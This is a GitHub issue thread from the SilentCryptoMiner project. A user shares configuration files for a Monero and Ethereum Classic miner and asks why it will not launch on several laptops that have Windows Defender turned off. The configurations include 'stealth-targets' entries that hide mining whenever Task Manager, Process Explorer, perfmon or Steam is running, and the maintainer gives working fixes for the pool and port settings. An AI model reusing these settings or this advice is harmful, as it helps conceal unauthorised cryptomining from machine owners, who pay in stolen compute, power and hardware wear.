### ISSUE TITLE
Setup problem

### ISSUE THREAD

**Issue by LizXuan** [UnamSanctam/SilentCryptoMiner#767]
Nothing happen when I double-clicked the .exe file. 
Nothing is running.
Last time didn't work on D drive, now I moved to C Drive\ Program Files(x86)

This xml (XMR/ETC) is modified from your [Example Zip file]([ExampleSettings_Full.zip](https://github.com/UnamSanctam/SilentCryptoMiner/files/8598284/ExampleSettings_Full.zip)):
{
    "algo": "rx/0",
    "pool": "pool.supportxmr.com",
    "port": 3333,
    "wallet": "{walletAddress}.{workerID}",
    "password": "",
    "nicehash": false,
    "ssltls": true,
    "max-cpu": 30,
    "idle-wait": 2,
    "idle-cpu": 90,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
    "kill-targets": ""
}

{
    "url": "stratums://`{walletAddress}`.{workerID}@asia2.ethermine.org:4444",
    "algo": "etchash",
    "max-gpu": 70,
    "idle-wait": 2,
    "idle-gpu": 100,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,Steam.exe",
    "kill-targets": ""
}
![image](https://user-images.githubusercontent.com/104403585/169691867-4a5eccf6-d7d6-412c-a187-50d235ece436.png)

**Comment by UnamSanctam** [comment]
SupportXMR requires a password (the worker name you want), they don't use the `Wallet.Worker` format. And for the ETH miner you have it set to `stratums` (SSL/TLS) but you're using port 4444 (non SSL/TLS port), change the port to 5555.

**Comment by LizXuan** [comment]
Hi @UnamSanctam, my 1st laptop is working fine now, thanks. But others laptop cant open in Local C, like the picture above, got the UAC shield icon but there is nothing happen after double clicking the application. You know what happen? 
Window Defender are closed.
My account can access Admin privilage.
